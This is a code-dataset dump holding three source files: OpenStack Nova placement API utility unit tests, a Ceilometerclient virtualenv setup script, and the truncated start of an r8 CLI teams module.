hexsha
stringlengths 40
40
| size
int64 4
1.02M
| ext
stringclasses 8
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
209
| max_stars_repo_name
stringlengths 5
121
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
209
| max_issues_repo_name
stringlengths 5
121
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
209
| max_forks_repo_name
stringlengths 5
121
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 4
1.02M
| avg_line_length
float64 1.07
66.1k
| max_line_length
int64 4
266k
| alphanum_fraction
float64 0.01
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
cf932b6b1aef935c1e708c38eef6e7cbd0b0f792
| 33,196
|
py
|
Python
|
nova/tests/unit/api/openstack/placement/test_util.py
|
cloudscale-ch/nova
|
4b4e005c639204f2c680eda61131a6930379d70e
|
[
"Apache-2.0"
] | 1
|
2018-05-27T09:38:17.000Z
|
2018-05-27T09:38:17.000Z
|
nova/tests/unit/api/openstack/placement/test_util.py
|
liyingjun/nova
|
dcdcb273606f52093f812b8f0903da404b15732b
|
[
"Apache-2.0"
] | null | null | null |
nova/tests/unit/api/openstack/placement/test_util.py
|
liyingjun/nova
|
dcdcb273606f52093f812b8f0903da404b15732b
|
[
"Apache-2.0"
] | null | null | null |
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Unit tests for the utility functions used by the placement API."""
import datetime
import fixtures
import microversion_parse
import mock
from oslo_middleware import request_id
from oslo_utils import timeutils
import webob
import six
from nova.api.openstack.placement import lib as pl
from nova.api.openstack.placement import microversion
from nova.api.openstack.placement.objects import resource_provider as rp_obj
from nova.api.openstack.placement import util
from nova import test
from nova.tests import uuidsentinel
class TestCheckAccept(test.NoDBTestCase):
"""Confirm behavior of util.check_accept."""
@staticmethod
@util.check_accept('application/json', 'application/vnd.openstack')
def handler(req):
"""Fake handler to test decorator."""
return True
def test_fail_no_match(self):
req = webob.Request.blank('/')
req.accept = 'text/plain'
error = self.assertRaises(webob.exc.HTTPNotAcceptable,
self.handler, req)
self.assertEqual(
'Only application/json, application/vnd.openstack is provided',
str(error))
def test_fail_complex_no_match(self):
req = webob.Request.blank('/')
req.accept = 'text/html;q=0.9,text/plain,application/vnd.aws;q=0.8'
error = self.assertRaises(webob.exc.HTTPNotAcceptable,
self.handler, req)
self.assertEqual(
'Only application/json, application/vnd.openstack is provided',
str(error))
def test_success_no_accept(self):
req = webob.Request.blank('/')
self.assertTrue(self.handler(req))
def test_success_simple_match(self):
req = webob.Request.blank('/')
req.accept = 'application/json'
self.assertTrue(self.handler(req))
def test_success_complex_any_match(self):
req = webob.Request.blank('/')
req.accept = 'application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
self.assertTrue(self.handler(req))
def test_success_complex_lower_quality_match(self):
req = webob.Request.blank('/')
req.accept = 'application/xml;q=0.9,application/vnd.openstack;q=0.8'
self.assertTrue(self.handler(req))
class TestExtractJSON(test.NoDBTestCase):
# Although the intent of this test class is not to test that
# schemas work, we may as well use a real one to ensure that
# behaviors are what we expect.
schema = {
"type": "object",
"properties": {
"name": {"type": "string"},
"uuid": {"type": "string", "format": "uuid"}
},
"required": ["name"],
"additionalProperties": False
}
def test_not_json(self):
error = self.assertRaises(webob.exc.HTTPBadRequest,
util.extract_json,
'I am a string',
self.schema)
self.assertIn('Malformed JSON', str(error))
def test_malformed_json(self):
error = self.assertRaises(webob.exc.HTTPBadRequest,
util.extract_json,
'{"my bytes got left behind":}',
self.schema)
self.assertIn('Malformed JSON', str(error))
def test_schema_mismatch(self):
error = self.assertRaises(webob.exc.HTTPBadRequest,
util.extract_json,
'{"a": "b"}',
self.schema)
self.assertIn('JSON does not validate', str(error))
def test_type_invalid(self):
error = self.assertRaises(webob.exc.HTTPBadRequest,
util.extract_json,
'{"name": 1}',
self.schema)
self.assertIn('JSON does not validate', str(error))
def test_format_checker(self):
error = self.assertRaises(webob.exc.HTTPBadRequest,
util.extract_json,
'{"name": "hello", "uuid": "not a uuid"}',
self.schema)
self.assertIn('JSON does not validate', str(error))
def test_no_additional_properties(self):
error = self.assertRaises(webob.exc.HTTPBadRequest,
util.extract_json,
'{"name": "hello", "cow": "moo"}',
self.schema)
self.assertIn('JSON does not validate', str(error))
def test_valid(self):
data = util.extract_json(
'{"name": "cow", '
'"uuid": "%s"}' % uuidsentinel.rp_uuid,
self.schema)
self.assertEqual('cow', data['name'])
self.assertEqual(uuidsentinel.rp_uuid, data['uuid'])
class QueryParamsSchemaTestCase(test.NoDBTestCase):
def test_validate_request(self):
schema = {
'type': 'object',
'properties': {
'foo': {'type': 'string'}
},
'additionalProperties': False}
req = webob.Request.blank('/test?foo=%88')
error = self.assertRaises(webob.exc.HTTPBadRequest,
util.validate_query_params,
req, schema)
self.assertIn('Invalid query string parameters', six.text_type(error))
class TestJSONErrorFormatter(test.NoDBTestCase):
def setUp(self):
super(TestJSONErrorFormatter, self).setUp()
self.environ = {}
# TODO(jaypipes): Remove this when we get more than a single version
# in the placement API. The fact that we only had a single version was
# masking a bug in the utils code.
_versions = [
'1.0',
'1.1',
]
mod_str = 'nova.api.openstack.placement.microversion.VERSIONS'
self.useFixture(fixtures.MonkeyPatch(mod_str, _versions))
def test_status_to_int_code(self):
body = ''
status = '404 Not Found'
title = ''
result = util.json_error_formatter(
body, status, title, self.environ)
self.assertEqual(404, result['errors'][0]['status'])
def test_strip_body_tags(self):
body = '<h1>Big Error!</h1>'
status = '400 Bad Request'
title = ''
result = util.json_error_formatter(
body, status, title, self.environ)
self.assertEqual('Big Error!', result['errors'][0]['detail'])
def test_request_id_presence(self):
body = ''
status = '400 Bad Request'
title = ''
# no request id in environ, none in error
result = util.json_error_formatter(
body, status, title, self.environ)
self.assertNotIn('request_id', result['errors'][0])
# request id in environ, request id in error
self.environ[request_id.ENV_REQUEST_ID] = 'stub-id'
result = util.json_error_formatter(
body, status, title, self.environ)
self.assertEqual('stub-id', result['errors'][0]['request_id'])
def test_microversion_406_handling(self):
body = ''
status = '400 Bad Request'
title = ''
# Not a 406, no version info required.
result = util.json_error_formatter(
body, status, title, self.environ)
self.assertNotIn('max_version', result['errors'][0])
self.assertNotIn('min_version', result['errors'][0])
# A 406 but not because of microversions (microversion
# parsing was successful), no version info
# required.
status = '406 Not Acceptable'
version_obj = microversion_parse.parse_version_string('2.3')
self.environ[microversion.MICROVERSION_ENVIRON] = version_obj
result = util.json_error_formatter(
body, status, title, self.environ)
self.assertNotIn('max_version', result['errors'][0])
self.assertNotIn('min_version', result['errors'][0])
# Microversion parsing failed, status is 406, send version info.
del self.environ[microversion.MICROVERSION_ENVIRON]
result = util.json_error_formatter(
body, status, title, self.environ)
self.assertEqual(microversion.max_version_string(),
result['errors'][0]['max_version'])
self.assertEqual(microversion.min_version_string(),
result['errors'][0]['min_version'])
class TestRequireContent(test.NoDBTestCase):
"""Confirm behavior of util.require_accept."""
@staticmethod
@util.require_content('application/json')
def handler(req):
"""Fake handler to test decorator."""
return True
def test_fail_no_content_type(self):
req = webob.Request.blank('/')
error = self.assertRaises(webob.exc.HTTPUnsupportedMediaType,
self.handler, req)
self.assertEqual(
'The media type None is not supported, use application/json',
str(error))
def test_fail_wrong_content_type(self):
req = webob.Request.blank('/')
req.content_type = 'text/plain'
error = self.assertRaises(webob.exc.HTTPUnsupportedMediaType,
self.handler, req)
self.assertEqual(
'The media type text/plain is not supported, use application/json',
str(error))
def test_success_content_type(self):
req = webob.Request.blank('/')
req.content_type = 'application/json'
self.assertTrue(self.handler(req))
class TestPlacementURLs(test.NoDBTestCase):
def setUp(self):
super(TestPlacementURLs, self).setUp()
self.resource_provider = rp_obj.ResourceProvider(
name=uuidsentinel.rp_name,
uuid=uuidsentinel.rp_uuid)
self.resource_class = rp_obj.ResourceClass(
name='CUSTOM_BAREMETAL_GOLD',
id=1000)
def test_resource_provider_url(self):
environ = {}
expected_url = '/resource_providers/%s' % uuidsentinel.rp_uuid
self.assertEqual(expected_url, util.resource_provider_url(
environ, self.resource_provider))
def test_resource_provider_url_prefix(self):
# SCRIPT_NAME represents the mount point of a WSGI
# application when it is hosted at a path/prefix.
environ = {'SCRIPT_NAME': '/placement'}
expected_url = ('/placement/resource_providers/%s'
% uuidsentinel.rp_uuid)
self.assertEqual(expected_url, util.resource_provider_url(
environ, self.resource_provider))
def test_inventories_url(self):
environ = {}
expected_url = ('/resource_providers/%s/inventories'
% uuidsentinel.rp_uuid)
self.assertEqual(expected_url, util.inventory_url(
environ, self.resource_provider))
def test_inventory_url(self):
resource_class = 'DISK_GB'
environ = {}
expected_url = ('/resource_providers/%s/inventories/%s'
% (uuidsentinel.rp_uuid, resource_class))
self.assertEqual(expected_url, util.inventory_url(
environ, self.resource_provider, resource_class))
def test_resource_class_url(self):
environ = {}
expected_url = '/resource_classes/CUSTOM_BAREMETAL_GOLD'
self.assertEqual(expected_url, util.resource_class_url(
environ, self.resource_class))
def test_resource_class_url_prefix(self):
# SCRIPT_NAME represents the mount point of a WSGI
# application when it is hosted at a path/prefix.
environ = {'SCRIPT_NAME': '/placement'}
expected_url = '/placement/resource_classes/CUSTOM_BAREMETAL_GOLD'
self.assertEqual(expected_url, util.resource_class_url(
environ, self.resource_class))
class TestNormalizeResourceQsParam(test.NoDBTestCase):
def test_success(self):
qs = "VCPU:1"
resources = util.normalize_resources_qs_param(qs)
expected = {
'VCPU': 1,
}
self.assertEqual(expected, resources)
qs = "VCPU:1,MEMORY_MB:1024,DISK_GB:100"
resources = util.normalize_resources_qs_param(qs)
expected = {
'VCPU': 1,
'MEMORY_MB': 1024,
'DISK_GB': 100,
}
self.assertEqual(expected, resources)
def test_400_empty_string(self):
qs = ""
self.assertRaises(
webob.exc.HTTPBadRequest,
util.normalize_resources_qs_param,
qs,
)
def test_400_bad_int(self):
qs = "VCPU:foo"
self.assertRaises(
webob.exc.HTTPBadRequest,
util.normalize_resources_qs_param,
qs,
)
def test_400_no_amount(self):
qs = "VCPU"
self.assertRaises(
webob.exc.HTTPBadRequest,
util.normalize_resources_qs_param,
qs,
)
def test_400_zero_amount(self):
qs = "VCPU:0"
self.assertRaises(
webob.exc.HTTPBadRequest,
util.normalize_resources_qs_param,
qs,
)
class TestNormalizeTraitsQsParam(test.NoDBTestCase):
def test_one(self):
trait = 'HW_CPU_X86_VMX'
# Various whitespace permutations
for fmt in ('%s', ' %s', '%s ', ' %s ', ' %s '):
self.assertEqual(set([trait]),
util.normalize_traits_qs_param(fmt % trait))
def test_multiple(self):
traits = (
'HW_CPU_X86_VMX',
'HW_GPU_API_DIRECT3D_V12_0',
'HW_NIC_OFFLOAD_RX',
'CUSTOM_GOLD',
'STORAGE_DISK_SSD',
)
self.assertEqual(
set(traits),
util.normalize_traits_qs_param('%s, %s,%s , %s , %s ' % traits))
def test_400_all_empty(self):
for qs in ('', ' ', ' ', ',', ' , , '):
self.assertRaises(
webob.exc.HTTPBadRequest, util.normalize_traits_qs_param, qs)
def test_400_some_empty(self):
traits = (
'HW_NIC_OFFLOAD_RX',
'CUSTOM_GOLD',
'STORAGE_DISK_SSD',
)
for fmt in ('%s,,%s,%s', ',%s,%s,%s', '%s,%s,%s,', ' %s , %s , , %s'):
self.assertRaises(webob.exc.HTTPBadRequest,
util.normalize_traits_qs_param, fmt % traits)
class TestParseQsRequestGroups(test.NoDBTestCase):
@staticmethod
def do_parse(qstring, version=(1, 18)):
"""Converts a querystring to a MultiDict, mimicking request.GET, and
runs parse_qs_request_groups on it.
"""
req = webob.Request.blank('?' + qstring)
mv_parsed = microversion_parse.Version(*version)
mv_parsed.max_version = microversion_parse.parse_version_string(
microversion.max_version_string())
mv_parsed.min_version = microversion_parse.parse_version_string(
microversion.min_version_string())
req.environ['placement.microversion'] = mv_parsed
d = util.parse_qs_request_groups(req)
# Sort for easier testing
return [d[suff] for suff in sorted(d)]
def assertRequestGroupsEqual(self, expected, observed):
self.assertEqual(len(expected), len(observed))
for exp, obs in zip(expected, observed):
self.assertEqual(vars(exp), vars(obs))
def test_empty_raises(self):
# TODO(efried): Check the specific error code
self.assertRaises(webob.exc.HTTPBadRequest, self.do_parse, '')
def test_unnumbered_only(self):
"""Unnumbered resources & traits - no numbered groupings."""
qs = ('resources=VCPU:2,MEMORY_MB:2048'
'&required=HW_CPU_X86_VMX,CUSTOM_GOLD')
expected = [
pl.RequestGroup(
use_same_provider=False,
resources={
'VCPU': 2,
'MEMORY_MB': 2048,
},
required_traits={
'HW_CPU_X86_VMX',
'CUSTOM_GOLD',
},
),
]
self.assertRequestGroupsEqual(expected, self.do_parse(qs))
def test_member_of_single_agg(self):
"""Unnumbered resources with one member_of query param."""
agg1_uuid = uuidsentinel.agg1
qs = ('resources=VCPU:2,MEMORY_MB:2048'
'&member_of=%s' % agg1_uuid)
expected = [
pl.RequestGroup(
use_same_provider=False,
resources={
'VCPU': 2,
'MEMORY_MB': 2048,
},
member_of=[
set([agg1_uuid])
]
),
]
self.assertRequestGroupsEqual(expected, self.do_parse(qs))
def test_member_of_multiple_aggs_prior_microversion(self):
"""Unnumbered resources with multiple member_of query params before the
supported microversion should raise a 400.
"""
agg1_uuid = uuidsentinel.agg1
agg2_uuid = uuidsentinel.agg2
qs = ('resources=VCPU:2,MEMORY_MB:2048'
'&member_of=%s'
'&member_of=%s' % (agg1_uuid, agg2_uuid))
self.assertRaises(webob.exc.HTTPBadRequest, self.do_parse, qs)
def test_member_of_multiple_aggs(self):
"""Unnumbered resources with multiple member_of query params."""
agg1_uuid = uuidsentinel.agg1
agg2_uuid = uuidsentinel.agg2
qs = ('resources=VCPU:2,MEMORY_MB:2048'
'&member_of=%s'
'&member_of=%s' % (agg1_uuid, agg2_uuid))
expected = [
pl.RequestGroup(
use_same_provider=False,
resources={
'VCPU': 2,
'MEMORY_MB': 2048,
},
member_of=[
set([agg1_uuid]),
set([agg2_uuid])
]
),
]
self.assertRequestGroupsEqual(
expected, self.do_parse(qs, version=(1, 24)))
def test_unnumbered_resources_only(self):
"""Validate the bit that can be used for 1.10 and earlier."""
qs = 'resources=VCPU:2,MEMORY_MB:2048,DISK_GB:5,CUSTOM_MAGIC:123'
expected = [
pl.RequestGroup(
use_same_provider=False,
resources={
'VCPU': 2,
'MEMORY_MB': 2048,
'DISK_GB': 5,
'CUSTOM_MAGIC': 123,
},
),
]
self.assertRequestGroupsEqual(expected, self.do_parse(qs))
def test_numbered_only(self):
# Crazy ordering and nonsequential numbers don't matter.
# It's okay to have a 'resources' without a 'required'.
# A trait that's repeated shows up in both spots.
qs = ('resources1=VCPU:2,MEMORY_MB:2048'
'&required42=CUSTOM_GOLD'
'&resources99=DISK_GB:5'
'&resources42=CUSTOM_MAGIC:123'
'&required1=HW_CPU_X86_VMX,CUSTOM_GOLD')
expected = [
pl.RequestGroup(
resources={
'VCPU': 2,
'MEMORY_MB': 2048,
},
required_traits={
'HW_CPU_X86_VMX',
'CUSTOM_GOLD',
},
),
pl.RequestGroup(
resources={
'CUSTOM_MAGIC': 123,
},
required_traits={
'CUSTOM_GOLD',
},
),
pl.RequestGroup(
resources={
'DISK_GB': 5,
},
),
]
self.assertRequestGroupsEqual(expected, self.do_parse(qs))
def test_numbered_and_unnumbered(self):
qs = ('resources=VCPU:3,MEMORY_MB:4096,DISK_GB:10'
'&required=HW_CPU_X86_VMX,CUSTOM_MEM_FLASH,STORAGE_DISK_SSD'
'&resources1=SRIOV_NET_VF:2'
'&required1=CUSTOM_PHYSNET_PRIVATE'
'&resources2=SRIOV_NET_VF:1,NET_INGRESS_BYTES_SEC:20000'
',NET_EGRESS_BYTES_SEC:10000'
'&required2=CUSTOM_SWITCH_BIG,CUSTOM_PHYSNET_PROD'
'&resources3=CUSTOM_MAGIC:123')
expected = [
pl.RequestGroup(
use_same_provider=False,
resources={
'VCPU': 3,
'MEMORY_MB': 4096,
'DISK_GB': 10,
},
required_traits={
'HW_CPU_X86_VMX',
'CUSTOM_MEM_FLASH',
'STORAGE_DISK_SSD',
},
),
pl.RequestGroup(
resources={
'SRIOV_NET_VF': 2,
},
required_traits={
'CUSTOM_PHYSNET_PRIVATE',
},
),
pl.RequestGroup(
resources={
'SRIOV_NET_VF': 1,
'NET_INGRESS_BYTES_SEC': 20000,
'NET_EGRESS_BYTES_SEC': 10000,
},
required_traits={
'CUSTOM_SWITCH_BIG',
'CUSTOM_PHYSNET_PROD',
},
),
pl.RequestGroup(
resources={
'CUSTOM_MAGIC': 123,
},
),
]
self.assertRequestGroupsEqual(expected, self.do_parse(qs))
def test_member_of_multiple_aggs_numbered(self):
"""Numbered resources with multiple member_of query params."""
agg1_uuid = uuidsentinel.agg1
agg2_uuid = uuidsentinel.agg2
agg3_uuid = uuidsentinel.agg3
agg4_uuid = uuidsentinel.agg4
qs = ('resources1=VCPU:2'
'&member_of1=%s'
'&member_of1=%s'
'&resources2=VCPU:2'
'&member_of2=in:%s,%s' % (
agg1_uuid, agg2_uuid, agg3_uuid, agg4_uuid))
expected = [
pl.RequestGroup(
resources={
'VCPU': 2,
},
member_of=[
set([agg1_uuid]),
set([agg2_uuid])
]
),
pl.RequestGroup(
resources={
'VCPU': 2,
},
member_of=[
set([agg3_uuid, agg4_uuid]),
]
),
]
self.assertRequestGroupsEqual(
expected, self.do_parse(qs, version=(1, 24)))
def test_400_malformed_resources(self):
# Somewhat duplicates TestNormalizeResourceQsParam.test_400*.
qs = ('resources=VCPU:0,MEMORY_MB:4096,DISK_GB:10'
# Bad ----------^
'&required=HW_CPU_X86_VMX,CUSTOM_MEM_FLASH,STORAGE_DISK_SSD'
'&resources1=SRIOV_NET_VF:2'
'&required1=CUSTOM_PHYSNET_PRIVATE'
'&resources2=SRIOV_NET_VF:1,NET_INGRESS_BYTES_SEC:20000'
',NET_EGRESS_BYTES_SEC:10000'
'&required2=CUSTOM_SWITCH_BIG,CUSTOM_PHYSNET_PROD'
'&resources3=CUSTOM_MAGIC:123')
self.assertRaises(webob.exc.HTTPBadRequest, self.do_parse, qs)
def test_400_malformed_traits(self):
# Somewhat duplicates TestNormalizeResourceQsParam.test_400*.
qs = ('resources=VCPU:7,MEMORY_MB:4096,DISK_GB:10'
'&required=HW_CPU_X86_VMX,CUSTOM_MEM_FLASH,STORAGE_DISK_SSD'
'&resources1=SRIOV_NET_VF:2'
'&required1=CUSTOM_PHYSNET_PRIVATE'
'&resources2=SRIOV_NET_VF:1,NET_INGRESS_BYTES_SEC:20000'
',NET_EGRESS_BYTES_SEC:10000'
'&required2=CUSTOM_SWITCH_BIG,CUSTOM_PHYSNET_PROD,'
# Bad -------------------------------------------^
'&resources3=CUSTOM_MAGIC:123')
self.assertRaises(webob.exc.HTTPBadRequest, self.do_parse, qs)
def test_400_traits_no_resources_unnumbered(self):
qs = ('resources9=VCPU:7,MEMORY_MB:4096,DISK_GB:10'
# Oops ---^
'&required=HW_CPU_X86_VMX,CUSTOM_MEM_FLASH,STORAGE_DISK_SSD'
'&resources1=SRIOV_NET_VF:2'
'&required1=CUSTOM_PHYSNET_PRIVATE'
'&resources2=SRIOV_NET_VF:1,NET_INGRESS_BYTES_SEC:20000'
',NET_EGRESS_BYTES_SEC:10000'
'&required2=CUSTOM_SWITCH_BIG,CUSTOM_PHYSNET_PROD'
'&resources3=CUSTOM_MAGIC:123')
self.assertRaises(webob.exc.HTTPBadRequest, self.do_parse, qs)
def test_400_traits_no_resources_numbered(self):
qs = ('resources=VCPU:7,MEMORY_MB:4096,DISK_GB:10'
'&required=HW_CPU_X86_VMX,CUSTOM_MEM_FLASH,STORAGE_DISK_SSD'
'&resources11=SRIOV_NET_VF:2'
# Oops ----^^
'&required1=CUSTOM_PHYSNET_PRIVATE'
'&resources20=SRIOV_NET_VF:1,NET_INGRESS_BYTES_SEC:20000'
# Oops ----^^
',NET_EGRESS_BYTES_SEC:10000'
'&required2=CUSTOM_SWITCH_BIG,CUSTOM_PHYSNET_PROD'
'&resources3=CUSTOM_MAGIC:123')
self.assertRaises(webob.exc.HTTPBadRequest, self.do_parse, qs)
def test_400_member_of_no_resources_numbered(self):
agg1_uuid = uuidsentinel.agg1
qs = ('resources=VCPU:7,MEMORY_MB:4096,DISK_GB:10'
'&required=HW_CPU_X86_VMX,CUSTOM_MEM_FLASH,STORAGE_DISK_SSD'
'&member_of2=%s' % agg1_uuid)
self.assertRaises(webob.exc.HTTPBadRequest, self.do_parse, qs)
def test_forbidden_one_group(self):
"""When forbidden are allowed this will parse, but otherwise will
indicate an invalid trait.
"""
qs = ('resources=VCPU:2,MEMORY_MB:2048'
'&required=CUSTOM_PHYSNET1,!CUSTOM_SWITCH_BIG')
expected_forbidden = [
pl.RequestGroup(
use_same_provider=False,
resources={
'VCPU': 2,
'MEMORY_MB': 2048,
},
required_traits={
'CUSTOM_PHYSNET1',
},
forbidden_traits={
'CUSTOM_SWITCH_BIG',
}
),
]
expected_message = (
"Invalid query string parameters: Expected 'required' parameter "
"value of the form: HW_CPU_X86_VMX,CUSTOM_MAGIC. Got: "
"CUSTOM_PHYSNET1,!CUSTOM_SWITCH_BIG")
exc = self.assertRaises(webob.exc.HTTPBadRequest, self.do_parse, qs)
self.assertEqual(expected_message, six.text_type(exc))
self.assertRequestGroupsEqual(
expected_forbidden, self.do_parse(qs, version=(1, 22)))
def test_forbidden_conflict(self):
qs = ('resources=VCPU:2,MEMORY_MB:2048'
'&required=CUSTOM_PHYSNET1,!CUSTOM_PHYSNET1')
expected_message = (
'Conflicting required and forbidden traits found '
'in the following traits keys: required: (CUSTOM_PHYSNET1)')
exc = self.assertRaises(webob.exc.HTTPBadRequest, self.do_parse, qs,
version=(1, 22))
self.assertEqual(expected_message, six.text_type(exc))
def test_forbidden_two_groups(self):
qs = ('resources=VCPU:2,MEMORY_MB:2048&resources1=CUSTOM_MAGIC:1'
'&required1=CUSTOM_PHYSNET1,!CUSTOM_PHYSNET2')
expected = [
pl.RequestGroup(
use_same_provider=False,
resources={
'VCPU': 2,
'MEMORY_MB': 2048,
},
),
pl.RequestGroup(
resources={
'CUSTOM_MAGIC': 1,
},
required_traits={
'CUSTOM_PHYSNET1',
},
forbidden_traits={
'CUSTOM_PHYSNET2',
}
),
]
self.assertRequestGroupsEqual(
expected, self.do_parse(qs, version=(1, 22)))
def test_forbidden_separate_groups_no_conflict(self):
qs = ('resources1=CUSTOM_MAGIC:1&required1=CUSTOM_PHYSNET1'
'&resources2=CUSTOM_MAGIC:1&required2=!CUSTOM_PHYSNET1')
expected = [
pl.RequestGroup(
use_same_provider=True,
resources={
'CUSTOM_MAGIC': 1,
},
required_traits={
'CUSTOM_PHYSNET1',
}
),
pl.RequestGroup(
use_same_provider=True,
resources={
'CUSTOM_MAGIC': 1,
},
forbidden_traits={
'CUSTOM_PHYSNET1',
}
),
]
self.assertRequestGroupsEqual(
expected, self.do_parse(qs, version=(1, 22)))
class TestPickLastModified(test.NoDBTestCase):
def setUp(self):
super(TestPickLastModified, self).setUp()
self.resource_provider = rp_obj.ResourceProvider(
name=uuidsentinel.rp_name, uuid=uuidsentinel.rp_uuid)
def test_updated_versus_none(self):
now = timeutils.utcnow(with_timezone=True)
self.resource_provider.updated_at = now
self.resource_provider.created_at = now
chosen_time = util.pick_last_modified(None, self.resource_provider)
self.assertEqual(now, chosen_time)
def test_created_versus_none(self):
now = timeutils.utcnow(with_timezone=True)
self.resource_provider.created_at = now
self.resource_provider.updated_at = None
chosen_time = util.pick_last_modified(None, self.resource_provider)
self.assertEqual(now, chosen_time)
def test_last_modified_less(self):
now = timeutils.utcnow(with_timezone=True)
less = now - datetime.timedelta(seconds=300)
self.resource_provider.updated_at = now
self.resource_provider.created_at = now
chosen_time = util.pick_last_modified(less, self.resource_provider)
self.assertEqual(now, chosen_time)
def test_last_modified_more(self):
now = timeutils.utcnow(with_timezone=True)
more = now + datetime.timedelta(seconds=300)
self.resource_provider.updated_at = now
self.resource_provider.created_at = now
chosen_time = util.pick_last_modified(more, self.resource_provider)
self.assertEqual(more, chosen_time)
def test_last_modified_same(self):
now = timeutils.utcnow(with_timezone=True)
self.resource_provider.updated_at = now
self.resource_provider.created_at = now
chosen_time = util.pick_last_modified(now, self.resource_provider)
self.assertEqual(now, chosen_time)
def test_no_object_time_fields_less(self):
# An unsaved ovo will not have the created_at or updated_at fields
# present on the object at all.
now = timeutils.utcnow(with_timezone=True)
less = now - datetime.timedelta(seconds=300)
with mock.patch('oslo_utils.timeutils.utcnow') as mock_utc:
mock_utc.return_value = now
chosen_time = util.pick_last_modified(
less, self.resource_provider)
self.assertEqual(now, chosen_time)
mock_utc.assert_called_once_with(with_timezone=True)
def test_no_object_time_fields_more(self):
# An unsaved ovo will not have the created_at or updated_at fields
# present on the object at all.
now = timeutils.utcnow(with_timezone=True)
more = now + datetime.timedelta(seconds=300)
with mock.patch('oslo_utils.timeutils.utcnow') as mock_utc:
mock_utc.return_value = now
chosen_time = util.pick_last_modified(
more, self.resource_provider)
self.assertEqual(more, chosen_time)
mock_utc.assert_called_once_with(with_timezone=True)
def test_no_object_time_fields_none(self):
# An unsaved ovo will not have the created_at or updated_at fields
# present on the object at all.
now = timeutils.utcnow(with_timezone=True)
with mock.patch('oslo_utils.timeutils.utcnow') as mock_utc:
mock_utc.return_value = now
chosen_time = util.pick_last_modified(
None, self.resource_provider)
self.assertEqual(now, chosen_time)
mock_utc.assert_called_once_with(with_timezone=True)
| 37.007804
| 79
| 0.575099
|
a11e7847958dcd21f11b7c0dedc55bf1d17e56c0
| 2,492
|
py
|
Python
|
tools/install_venv.py
|
citrix-openstack-build/python-ceilometerclient
|
c3283ec1e861f29a53c59c1a09f2a1bc21a713e4
|
[
"Apache-2.0"
] | null | null | null |
tools/install_venv.py
|
citrix-openstack-build/python-ceilometerclient
|
c3283ec1e861f29a53c59c1a09f2a1bc21a713e4
|
[
"Apache-2.0"
] | null | null | null |
tools/install_venv.py
|
citrix-openstack-build/python-ceilometerclient
|
c3283ec1e861f29a53c59c1a09f2a1bc21a713e4
|
[
"Apache-2.0"
] | null | null | null |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2010 OpenStack Foundation
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import sys
import install_venv_common as install_venv
def print_help(venv, root):
help = """
Ceilometerclient development environment setup is complete.
Ceilometerclient development uses virtualenv to track and manage Python
dependencies while in development and testing.
To activate the Ceilometerclient virtualenv for the extent of your current
shell session you can run:
$ source %s/bin/activate
Or, if you prefer, you can run commands in the virtualenv on a case by case
basis by running:
$ %s/tools/with_venv.sh <your command>
Also, make test will automatically use the virtualenv.
"""
print help % (venv, root)
def main(argv):
root = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
if os.environ.get('tools_path'):
root = os.environ['tools_path']
venv = os.path.join(root, '.venv')
if os.environ.get('venv'):
venv = os.environ['venv']
pip_requires = os.path.join(root, 'requirements.txt')
test_requires = os.path.join(root, 'test-requirements.txt')
py_version = "python%s.%s" % (sys.version_info[0], sys.version_info[1])
project = 'Ceilometerclient'
install = install_venv.InstallVenv(root, venv, pip_requires, test_requires,
py_version, project)
options = install.parse_args(argv)
install.check_python_version()
install.check_dependencies()
install.create_virtualenv(no_site_packages=options.no_site_packages)
install.install_dependencies()
install.post_process()
print_help(venv, root)
if __name__ == '__main__':
main(sys.argv)
| 33.226667
| 79
| 0.712681
|
44d2e5f1b7e974d3b135805daec957720bdbfaf2
| 1,049
|
py
|
Python
|
r8/cli/teams.py
|
mhils/r8
|
b5b0cfa5045213abe896eea450012924d3e1fe9c
|
[
"MIT"
] | 14
|
2018-09-19T15:17:38.000Z
|
2022-01-14T10:59:55.000Z
|
r8/cli/teams.py
|
mhils/r8
|
b5b0cfa5045213abe896eea450012924d3e1fe9c
|
[
"MIT"
] | 3
|
2019-05-29T16:47:36.000Z
|
2020-05-02T18:16:17.000Z
|
r8/cli/teams.py
|
mhils/r8
|
b5b0cfa5045213abe896eea450012924d3e1fe9c
|
[
"MIT"
] | 3
|
2020-12-19T01:12:15.000Z
|
2021-02-27T21:29:43.000Z
|
import click
import r8
from r8 import util
@click.group("teams")
def cli():
"""Team-related commands."""
pass
@cli.command("list")
@util.with_database()
